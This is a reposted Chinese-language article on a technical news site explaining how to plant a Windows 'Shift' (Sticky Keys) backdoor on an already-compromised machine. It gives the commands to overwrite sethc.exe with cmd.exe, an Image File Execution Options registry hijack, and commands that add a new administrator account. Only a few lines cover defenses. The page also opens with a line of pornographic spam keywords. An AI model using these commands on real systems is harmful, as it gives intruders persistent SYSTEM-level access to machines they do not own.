国产精品久久久aaaa,日日干夜夜操天天插,亚洲乱熟女香蕉一区二区三区少妇,99精品国产高清一区二区三区,国产成人精品一区二区色戒,久久久国产精品成人免费,亚洲精品毛片久久久久,99久久婷婷国产综合精品电影,国产一区二区三区任你鲁

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

Windows Shift后門利用

jf_hKIAo4na ? 來源:Mi1k7ea ? 2023-01-30 10:38 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

0x00 前言

通常,在內(nèi)網(wǎng)滲透打下一臺機子之后,可以給這臺機子留個Shift后門。

0x01 Shift后門利用

簡介

粘滯鍵漏洞,在Windows系統(tǒng)下連續(xù)按5下SHIFT鍵,可以啟動系統(tǒng)的粘滯鍵功能,其進程名為Sethc.exe,應(yīng)用程序在Windowssystem32下。

黑客用其它應(yīng)用程序(如:cmd.exe、explorer.exe 或木馬、病毒)將Sethc.exe替換。當(dāng)再次連續(xù)按5次SHIFT鍵,就會啟動黑客替換的應(yīng)用程序,如此便留下了5下SHIFT后門,黑客3389登錄遠(yuǎn)程計算機時,在用戶登錄界面,連續(xù)按5下SHIFT就可以啟動該漏洞,進而控制遠(yuǎn)程計算機。

漏洞原理

在Windows系統(tǒng)登錄界面狀態(tài)下,粘滯鍵仍可以以連續(xù)按5下SHIFT鍵運行,并且此時應(yīng)用程序會以WINDOWS的最高權(quán)限-SYSTEM權(quán)限運行,所以計算機一旦被安裝該后門,入侵者便可悄無聲息地遠(yuǎn)程操縱計算機。

漏洞利用

大致思路如下:

拿到目標(biāo)主機權(quán)限后,到Windowssystem32目錄下,將sethc.exe替換成cmd.exe;

其中,命令行方式為:

copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
attrib c:windowssystem32sethc.exe +h
attrib c:windowssystem32dllcachesethc.exe +h

注意:要將dllcache文件夾中的緩存刪掉,否則會自動復(fù)原回去。

注冊表方式為:

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"

命令說明:reg add是向注冊表添加記錄,后面跟的是注冊表的位置,注意的是HKLM是HKEY_LOCAL_MACHINE的縮寫。Image File Execution Option這個目錄是用來設(shè)置鏡像劫持的,要被劫持的就是命令中的sethc粘滯鍵程序,隨后通過/ v來指定鍵名,其中鍵名debugger是固定的,然后通過/ t來指定REG_SZ字符串類型,最后通過/ d來指定鍵的值,即被惡意替換的程序cmd.exe。

這樣,在下次遠(yuǎn)程連接目標(biāo)主機登錄的時候就可以連續(xù)5下SHIFT觸發(fā)cmd.exe;

可以輸入explorer.exe調(diào)出程序管理系統(tǒng)方便操作;

當(dāng)然,上面的方法存在缺陷,就是可能會導(dǎo)致遠(yuǎn)程連接無法持久進行,因此可以直接添加新用戶便于下次直接登錄:

net user mi1k7ea 123456 /add
net localgroup administrators mi1k7ea /add'

防御方法

如果系統(tǒng)盤為NTFS文件系統(tǒng),可以將sytem32下的sethc.exe文件設(shè)為everyone拒絕訪問;

直接將其刪除,最好的方法是在控制面板-輔助功能選項-粘滯鍵選項,將“使用快捷鍵”取消即可。;

通過注冊表設(shè)置實現(xiàn)防御;

審核編輯 :李倩

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • WINDOWS
    +關(guān)注

    關(guān)注

    4

    文章

    3702

    瀏覽量

    94011
  • 應(yīng)用程序
    +關(guān)注

    關(guān)注

    38

    文章

    3344

    瀏覽量

    60251
  • Shift
    +關(guān)注

    關(guān)注

    0

    文章

    5

    瀏覽量

    7666

原文標(biāo)題:Windows Shift后門利用

文章出處:【微信號:菜鳥學(xué)安全,微信公眾號:菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評論

    相關(guān)推薦
    熱點推薦

    你的手機在監(jiān)聽!國安部曝光境外芯片可能暗藏“后門

    電子發(fā)燒友網(wǎng)報道(文/黃山明)如果家中門鎖有一把鑰匙掌握在自己不知道的人手中,相信住在里面的人也不會安心。如果是芯片被安裝了“后門”,那么被保存在其中的資料,自然存在泄露的風(fēng)險。近期,國家安全部公開
    的頭像 發(fā)表于 07-22 07:31 ?6481次閱讀

    windows系統(tǒng)的平板找不到SIM卡槽在哪里? 試試這個方法!#三防平板電腦 #工業(yè)平板

    Windows系統(tǒng)
    高通電子三防平板電腦
    發(fā)布于 :2025年12月04日 14:04:14

    從零開始利用NMSIS庫搭建神經(jīng)網(wǎng)絡(luò)(一)

    環(huán)境:Vivado2021.1、NucleiStudio_IDE_202102-win64 內(nèi)容:從零開始利用NMSIS庫搭建神經(jīng)網(wǎng)絡(luò),這一節(jié)主講基本的NMSIS庫卷積函數(shù)的解讀。 一、自測檢查
    發(fā)表于 10-24 13:47

    行業(yè)觀察 | Windows 10于本月終止服務(wù)支持,微軟發(fā)布10月高危漏洞更新

    已被實際利用的零日漏洞,以及多個CVSS評分高達(dá)9.9的關(guān)鍵遠(yuǎn)程代碼執(zhí)行漏洞。隨著Windows10于本月終止服務(wù)支持,IT團隊面臨關(guān)鍵的更新周期,需重點關(guān)注身份認(rèn)
    的頭像 發(fā)表于 10-16 16:57 ?1853次閱讀
    行業(yè)觀察 | <b class='flag-5'>Windows</b> 10于本月終止服務(wù)支持,微軟發(fā)布10月高危漏洞更新

    工業(yè)場景安全需求升級,RT-Thread 睿賽德全棧方案破解 OS 安全與效率痛點

    ” 2025年4月,我國公安機關(guān)正式通緝?nèi)齻€美國國家安全局(NSA)的特工,因其被懷疑對哈爾濱2025年亞洲冬季運動會進行了網(wǎng)絡(luò)攻擊。這些美國特工利用微軟Windows系統(tǒng)發(fā)送加密指令,在遠(yuǎn)程啟動隱藏的后門成功入侵了黑龍江省內(nèi)的
    的頭像 發(fā)表于 09-17 15:39 ?705次閱讀

    英偉達(dá)被約談!“后門”風(fēng)險陰影下,人臉識別終端為何選國產(chǎn)芯片

    7月31日消息,為維護中國用戶網(wǎng)絡(luò)安全、數(shù)據(jù)安全,國家互聯(lián)網(wǎng)信息辦公室已約談英偉達(dá),要求英偉達(dá)公司就對華銷售的H20算力芯片漏洞后門安全風(fēng)險問題進行說明,并提交相關(guān)證明材料。英偉達(dá)芯片是否存在芯片
    的頭像 發(fā)表于 08-08 09:43 ?918次閱讀
    英偉達(dá)被約談!“<b class='flag-5'>后門</b>”風(fēng)險陰影下,人臉識別終端為何選國產(chǎn)芯片

    CYBLE-416045_EVAL BLE如何連接到Windows

    我嘗試使用 Windows BLE UI 設(shè)置將PSoC? CYBLE-416045_EVAL 與我的 Windows over BLE 配對。 我正在運行一個示例
    發(fā)表于 07-24 07:03

    國安部:境外產(chǎn)芯片或故意留“后門

    根據(jù)國家安全部微信公眾號發(fā)布的消息,我們發(fā)現(xiàn)居然有境外產(chǎn)芯片或故意留“后門”。 當(dāng)心你身邊的“隱形竊密通道” 在如今高度數(shù)字化的時代,網(wǎng)絡(luò)安全的重要性愈發(fā)凸顯,不僅關(guān)乎著個人隱私、企業(yè)秘密,甚至
    的頭像 發(fā)表于 07-21 11:47 ?1w次閱讀

    今日看點丨國安部:境外生產(chǎn)芯片可能留“后門” 攝像頭被遠(yuǎn)程開啟;英特爾終止了對 Clear Linux 的支持;宇

    ? ? ? 1、國安部:境外生產(chǎn)芯片可能留“后門”?攝像頭被遠(yuǎn)程開啟 據(jù)國家安全部官微消息,一些境外生產(chǎn)的芯片、智能設(shè)備或者軟件可能在設(shè)計制造階段就被故意預(yù)埋了后門,廠商可以通過特定信號對設(shè)備進行
    發(fā)表于 07-21 10:51 ?2502次閱讀
    今日看點丨國安部:境外生產(chǎn)芯片可能留“<b class='flag-5'>后門</b>” 攝像頭被遠(yuǎn)程開啟;英特爾終止了對 Clear Linux 的支持;宇

    國產(chǎn)海光OPS電腦怎樣快速切換windows和國產(chǎn)麒麟統(tǒng)信系統(tǒng)

    WINDOWS
    深圳雙芯信息科技有限公司
    發(fā)布于 :2025年06月23日 12:40:57

    龍芯處理器支持WINDOWS嗎?

    龍芯處理器目前不支持原生運行Windows操作系統(tǒng),主要原因如下: 架構(gòu)差異 龍芯架構(gòu):龍芯早期基于MIPS架構(gòu),后續(xù)轉(zhuǎn)向自主研發(fā)的LoongArch指令集(與x86/ARM不兼容
    發(fā)表于 06-05 14:24

    統(tǒng)信Windows應(yīng)用兼容引擎V3.3.0更新

    為打破平臺界限,讓應(yīng)用體驗無縫銜接,deepin 團隊基于 Wine 技術(shù),推出了“統(tǒng)信 Windows 應(yīng)用兼容引擎”,支持在 deepin 和統(tǒng)信 UOS 系統(tǒng)上直接雙擊運行 Windows
    的頭像 發(fā)表于 06-04 13:58 ?1610次閱讀

    值得體驗的多款Windows on Arm應(yīng)用

    隨著越來越多的開發(fā)者紛紛通過 Arm 原生支持的方式,打造更快速、更智能的應(yīng)用體驗,Windows on Arm 的發(fā)展勢頭和用戶普及率持續(xù)加速升溫。如今,普通 Windows 用戶有超過 90
    的頭像 發(fā)表于 05-28 13:56 ?2123次閱讀

    如何設(shè)置 Raspberry Pi 操作系統(tǒng) Windows 模擬器:完全指南!

    為何要在Windows上模擬樹莓派操作系統(tǒng)?在Windows上模擬樹莓派操作系統(tǒng)是利用虛擬化技術(shù)進行開發(fā)、測試和學(xué)習(xí),而無需物理樹莓派硬件,這是一種強大的方式,并且允許您在WindowsPC上的受控
    的頭像 發(fā)表于 05-20 16:23 ?1186次閱讀
    如何設(shè)置 Raspberry Pi 操作系統(tǒng) <b class='flag-5'>Windows</b> 模擬器:完全指南!

    Xilinx Shift RAM IP概述和主要功能

    Xilinx Shift RAM IP 是 AMD Xilinx 提供的一個 LogiCORE IP 核,用于在 FPGA 中實現(xiàn)高效的移位寄存器(Shift Register)。該 IP 核利用
    的頭像 發(fā)表于 05-14 09:36 ?1071次閱讀